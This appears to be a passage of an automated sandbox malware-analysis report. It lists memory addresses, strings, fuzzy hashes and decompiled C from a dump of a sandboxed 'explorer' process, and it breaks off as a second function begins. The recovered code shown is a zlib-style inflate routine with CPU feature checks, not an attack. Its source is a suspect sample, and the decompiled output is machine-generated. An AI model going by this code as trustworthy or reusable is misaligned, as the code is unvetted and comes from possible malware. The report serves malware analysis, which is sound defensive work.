0x01526d0f
0x01526d0f
0x01526d11
0x00000000
0x01526d11
0x01526bf6
0x01526bf8
0x01526bfd
0x01526c05
0x01526c08
0x01526c0b
0x01526c11
0x01526c11
0x01526c11
0x01526c13
0x01526c27
0x01526c27
0x01526c2c
0x01526c2e
0x01526c31
0x01526c34
0x01526c37
0x01526c3a
0x01526c3d
0x01526c3d
0x01526c3d
0x01526c3d
0x00000000
0x01526c1f
0x01526bb9
0x01526bbf
0x01526bc1
0x01526bc3
0x01526bc8
0x01526bca
0x01526bca
0x01526bd4
0x01526bd6
0x01526bd8
0x01526bda
0x00000000
0x01526bda
0x01526b2c
0x01526b2c
0x01526f98
0x01526f9f
0x01526fa1
0x01526fa1
0x01526fa3
0x01526fa9
0x01526fac
0x01526faf
0x01526fb4
0x01526fb6
0x01526fb9
0x01526fbc
0x01526fbe
0x01526fc6
0x01526fca
0x01526fcc
0x01526fd0
0x01526fd8
0x01526fd8
0x01526fdc
0x01526fe5
0x01526fed
0x01526fef
0x01526ff2
0x01526ff5
0x01526ff5
0x01526ff9
0x01526ffc
0x01527002
0x01527015
0x01527004
0x01527009
0x01527009
0x01527018
0x0152701e
0x01527037
0x01527020
0x01527028
0x01527028
0x0152703d
0x01527042
0x01527042
0x01526a95
0x01526a96
0x01526a97
0x01526a98
0x01526a99
0x01526a9d
0x01526aa4
0x01526aa5
0x01526aa6
0x01526aa7
0x01526aa9
0x01526aef
0x01526aef
0x01526af9
0x01526af9
0x01526afa
0x01526afb
0x01526afc
0x00000000
0x01526afc
0x01526aad
0x01526ab5
0x00000000
0x01526ac7
0x01526acc
0x01526ad7
0x00000000
0x01526ae3
0x01526ae3
0x00000000
0x01526ae3
0x01526ad7
0x01526ab5
0x01526d1c
0x01526d1e
0x01526d21
0x01526d23
0x01526d27
0x01526d2a
0x01526d2f
0x01526d32
0x01526d35
0x01526d3c
0x01526d3c
0x01526d42
0x01526d44
0x01526d47
0x01526d4a
0x01526d4d
0x01526d50
0x01526d53
0x01526d53
0x01526d56
0x01526d59
0x01526d5c
0x01526d5f
0x01526d62
0x01526d62
0x01526d65
0x01526d68
0x01526d6c
0x00000000
0x00000000
0x01526d89
0x01526d8e
0x01526e76
0x00000000
0x00000000
0x01526e7f
0x01526e82
0x01526e8e
0x00000000
0x01526e8e
0x01526d94
0x01526d97
0x01526d99
0x01526d9c
0x01526d9f
0x01526da2
0x01526dab
0x01526dab
0x01526dad
0x01526db3
0x01526db5
0x01526db8
0x01526dbb
0x01526dbe
0x01526dc1
0x01526dc4
0x01526dc4
0x01526dcb
0x01526dce
0x01526dd1
0x01526dd4
0x01526dd7
0x01526dd7
0x01526ddc
0x01526ddf
0x01526de1
0x01526de6
0x00000000
0x00000000
0x01526e9a
0x00000000
0x00000000
0x01526ea3
0x01526ea6
0x01526eb6
0x01526eb6
0x01526dec
0x01526def
0x01526e4b
0x01526e05
0x01526e05
0x01526e0b
0x01526e11
0x01526ec2
0x01526ec6
0x01526ec8
0x01526ece
0x00000000
0x00000000
0x01526ed4
0x01526edb
0x01526efd
0x01526f03
0x01526f2f
0x01526f33
0x01526f35
0x01526f37
0x01526f37
0x01526f37
0x01526f3b
0x01526f3b
0x01526f05
0x01526f0b
0x01526f0d
0x01526f11
0x01526f13
0x01526f15
0x01526f15
0x01526f15
0x01526f17
0x01526f1b
0x01526f21
0x01526f23
0x01526f25
0x01526f25
0x01526f25
0x01526f29
0x01526f29
0x01526f21
0x01526f11
0x01526edd
0x01526edf
0x01526ee3
0x01526ee5
0x01526ee7
0x01526ee7
0x01526ee7
0x01526eeb
0x01526eeb
0x01526ee3
0x01526f3d
0x01526f3f
0x01526f3f
0x01526f3f
0x01526f41
0x01526f45
0x00000000
0x01526f45
0x01526e1b
0x01526e1d
0x01526e22
0x01526e2a
0x01526e2d
0x01526e30
0x01526e36
0x01526e36
0x01526e36
0x01526e38
0x01526e3c
0x00000000
0x01526e53
0x01526e53
0x01526e56
0x01526e58
0x01526e5b
0x01526e5e
0x01526e61
0x01526e64
0x01526e67
0x01526e67
0x01526e67
0x01526e69
0x01526d72
0x01526d76
0x00000000
0x00000000
0x00000000
0x01526d76
0x01526e4b
0x01526df1
0x01526df4
0x01526df7
0x01526dfa
0x01526e03
0x00000000
0x01526e03
0x01526d6e
0x01526d71
0x00000000
0x01526d7c
0x01526d7c
0x00000000
0x01526d82

Strings

ntel, xrefs: 01526AB7
ineI, xrefs: 01526ABF
Genu, xrefs: 01526AAF
invalid distance code, xrefs: 01526F4E
invalid distance too far back, xrefs: 01526F7A
invalid literal/length code, xrefs: 01526F6A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
API String ID: 0-3089872807
Opcode ID: eb33b8f424a4fa9d01b4afb3b24ab66ead9bb014cfd4a5c301e4338d0368e10d
Instruction ID: f6adfcbf4f73fe49be2bc6ed11a1e7fa9db3f5aba758a8eb900a7f6e7de54ed0
Opcode Fuzzy Hash: eb33b8f424a4fa9d01b4afb3b24ab66ead9bb014cfd4a5c301e4338d0368e10d
Instruction Fuzzy Hash: 3012F333A083658FDB15CE3CC59061EBBE1BB8A314F448A2DEC959BB85D771AD48C781

Uniqueness

Uniqueness Score: 0.90%

Function 0040280F, Relevance: 8.1, Strings: 6, Instructions: 577
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E0040280F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x40f640 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x40f640 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x40f640 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x40f640 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x40f640 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x40278c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x40278c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x40278c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x40278c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}

0x0040280f
0x00402814
0x00402815
0x00402818
0x00402819
0x0040281d
0x00402823
0x0040282a
0x0040282e
0x00402836
0x00402839
0x0040284a
0x0040284e
0x00402852
0x0040285c
0x00402860
0x0040286f
0x0040287d
0x00402881
0x00402887
0x0040288a
0x0040288e
0x00402892
0x00402896
0x00402899
0x0040289c
0x004028a0
0x004028a6
0x004028ca
0x004028d0
0x004028d6
0x004028d7
0x004028d9
0x004028dc
0x004028de
0x00000000
0x004028de
0x00000000
0x004028a8
0x004028ab
0x004028be
0x004028be
0x004028be
0x004028c0
0x004028c4
0x004028e2
0x004028e2
0x004028e6
0x004028e6
0x004028ed
0x00000000
0x00000000
0x004028f3
0x00402960
0x00402963
0x00402967
0x00402969
0x0040296b
0x00402970
0x00402970
0x0040297b
0x0040297e
0x00402980
0x00402982
0x00402986
0x0040298b
0x0040298b
0x0040298b
0x004029a3
0x004029a6
0x004029aa
0x00402aa6
0x00402dba
0x00402dbc
0x00402dca
0x00402dcf
0x00402dbe
0x00402dbe
0x00402dc3
0x00402dc3
0x00402de6
0x00402de6
0x00402dec
0x00402dee
0x00402dee
0x00402df4
0x00000000
0x00402df4
0x00402abc
0x00000000
0x00402abc
0x004029b0
0x004029b3
0x004029b7
0x004029bd
0x004029bf
0x004029c1
0x004029c6
0x004029c8
0x004029c8
0x004029d2
0x004029d4
0x004029d6
0x004029d8
0x004029d8
0x004029da
0x004029e1
0x004029e5
0x004029e7
0x004029e9
0x004029ee
0x004029ee
0x004029fa
0x004029fd
0x004029ff
0x00402a04
0x00402a06
0x00402a08
0x00402a0c
0x00000000
0x00000000
0x00402ac6
0x00402dae
0x00402dae
0x00402db3
0x00000000
0x00402db3
0x00402adc
0x00402adc
0x00402a12
0x00402a15
0x00402a7f
0x00402a3e
0x00402a3e
0x00402a44
0x00402a4a
0x00402ae6
0x00402aea
0x00402aec
0x00402af2
0x00402dd6
0x00402dd6
0x00402dda
0x00402ddf
0x00000000
0x00402ddf
0x00402af8
0x00402aff
0x00402b25
0x00402b2b
0x00402b5b
0x00402b5d
0x00402b63
0x00402b67
0x00402b67
0x00402b67
0x00402b6b
0x00402b6b
0x00402b2d
0x00402b33
0x00402b35
0x00402b37
0x00402b3d
0x00402b41
0x00402b41
0x00402b41
0x00402b43
0x00402b47
0x00402b4d
0x00402b51
0x00402b51
0x00402b51
0x00402b55
0x00402b55
0x00402b4d
0x00402b3d
0x00402b01
0x00402b03
0x00402b05
0x00402b0b
0x00402b0f
0x00402b0f
0x00402b0f
0x00402b13
0x00402b13
0x00402b0b
0x00402b6d
0x00402b6f
0x00402b6f
0x00402b6f
0x00402b71
0x00000000
0x00402b71
0x00402a56
0x00402a58
0x00402a5d
0x00402a65
0x00402a68
0x00402a6b
0x00402a71
0x00402a71
0x00402a71
0x00402a73
0x00402a87
0x00402a87
0x00402a8c
0x00402a8e
0x00402a91
0x00402a94
0x00402a97
0x00402a9a
0x00402a9d
0x00402a9d
0x00402a9d
0x00402a9d
0x00000000
0x00402a7f
0x00402a19
0x00402a1f
0x00402a21
0x00402a23
0x00402a28
0x00402a2a
0x00402a2a
0x00402a34
0x00402a36
0x00402a38
0x00402a3a
0x00000000
0x00402a3a
0x0040298c
0x0040298c
0x00402df8
0x00402dff
0x00402e01
0x00402e01
0x00402e03
0x00402e09
0x00402e0c
0x00402e0f
0x00402e14
0x00402e16
0x00402e19
0x00402e1c
0x00402e1e
0x00402e26
0x00402e2a
0x00402e2c
0x00402e30
0x00402e38
0x00402e38
0x00402e3c
0x00402e45
0x00402e4d
0x00402e4f
0x00402e52
0x00402e55
0x00402e55
0x00402e59
0x00402e5c
0x00402e62
0x00402e75
0x00402e64
0x00402e69
0x00402e69
0x00402e78
0x00402e7e
0x00402e97
0x00402e80
0x00402e88
0x00402e88
0x00402e9d
0x00402ea2
0x00402ea2
0x004028f5
0x004028f6
0x004028f7
0x004028f8
0x004028f9
0x004028fd
0x00402904
0x00402905
0x00402906
0x00402907
0x00402909
0x0040294f
0x0040294f
0x00402959
0x00402959
0x0040295a
0x0040295b
0x0040295c
0x00000000
0x0040295c
0x0040290d
0x00402915
0x00000000
0x00402927
0x0040292c
0x00402937
0x00000000
0x00402943
0x00402943
0x00000000
0x00402943
0x00402937
0x00402915
0x00402b7c
0x00402b7e
0x00402b81
0x00402b83
0x00402b87
0x00402b8a
0x00402b8f
0x00402b92
0x00402b95
0x00402b9c
0x00402b9c
0x00402ba2
0x00402ba4
0x00402ba7
0x00402baa
0x00402bad
0x00402bb0
0x00402bb3
0x00402bb3
0x00402bb6
0x00402bb9
0x00402bbc
0x00402bbf
0x00402bc2
0x00402bc2
0x00402bc5
0x00402bc8
0x00402bcc
0x00000000
0x00000000
0x00402be9
0x00402bee
0x00402cd6
0x00000000
0x00000000
0x00402cdf
0x00402ce2
0x00402cee
0x00000000
0x00402cee
0x00402bf4
0x00402bf7
0x00402bf9
0x00402bfc
0x00402bff
0x00402c02
0x00402c0b
0x00402c0b
0x00402c0d
0x00402c13
0x00402c15
0x00402c18
0x00402c1b
0x00402c1e
0x00402c21
0x00402c24
0x00402c24
0x00402c2b
0x00402c2e
0x00402c31
0x00402c34
0x00402c37
0x00402c37
0x00402c3c
0x00402c3f
0x00402c41
0x00402c46
0x00000000
0x00000000
0x00402cfa
0x00000000
0x00000000
0x00402d03
0x00402d06
0x00402d16
0x00402d16
0x00402c4c
0x00402c4f
0x00402cab
0x00402c65
0x00402c65
0x00402c6b
0x00402c71
0x00402d22
0x00402d26
0x00402d28
0x00402d2e
0x00000000
0x00000000
0x00402d34
0x00402d3b
0x00402d5d
0x00402d63
0x00402d8f
0x00402d93
0x00402d95
0x00402d97
0x00402d97
0x00402d97
0x00402d9b
0x00402d9b
0x00402d65
0x00402d6b
0x00402d6d
0x00402d71
0x00402d73
0x00402d75
0x00402d75
0x00402d75
0x00402d77
0x00402d7b
0x00402d81
0x00402d83
0x00402d85
0x00402d85
0x00402d85
0x00402d89
0x00402d89
0x00402d81
0x00402d71
0x00402d3d
0x00402d3f
0x00402d43
0x00402d45
0x00402d47
0x00402d47
0x00402d47
0x00402d4b
0x00402d4b
0x00402d43
0x00402d9d
0x00402d9f
0x00402d9f
0x00402d9f
0x00402da1
0x00402da5
0x00000000
0x00402da5
0x00402c7b
0x00402c7d
0x00402c82
0x00402c8a
0x00402c8d
0x00402c90
0x00402c96
0x00402c96
0x00402c96
0x00402c98
0x00402c9c
0x00000000
0x00402cb3
0x00402cb3
0x00402cb6
0x00402cb8
0x00402cbb
0x00402cbe
0x00402cc1
0x00402cc4
0x00402cc7
0x00402cc7
0x00402cc7
0x00402cc9
0x00402bd2
0x00402bd6
0x00000000
0x00000000
0x00000000
0x00402bd6
0x00402cab
0x00402c51
0x00402c54
0x00402c57
0x00402c5a
0x00402c63
0x00000000
0x00402c63
0x00402bce
0x00402bd1
0x00000000
0x00402bdc
0x00402bdc
0x00000000
0x00402be2

Strings

invalid literal/length code, xrefs: 00402DCA
ntel, xrefs: 00402917
invalid distance code, xrefs: 00402DAE
invalid distance too far back, xrefs: 00402DDA
Genu, xrefs: 0040290F
ineI, xrefs: 0040291F

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
API String ID: 0-3089872807
Opcode ID: 4d41a28db4c8268107ff3ab23ce368865a912ffef07cd1bcdef041f14ef129a8
Instruction ID: 57c17b965f765bb40cc07190c931d80e775d594a4c4f3ddc43378bc259a0fb78
Opcode Fuzzy Hash: 4d41a28db4c8268107ff3ab23ce368865a912ffef07cd1bcdef041f14ef129a8
Instruction Fuzzy Hash: 87122731A083568FD715DE38C68821AB7E1BF84314F14863EE895A3BC1D3B9ED49D789

Uniqueness

Uniqueness Score: 0.90%

Function 00400BA0, Relevance: 7.6, APIs: 5, Instructions: 109
sleepCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00400BA0(short* _a4, intOrPtr _a8, intOrPtr _a12) {
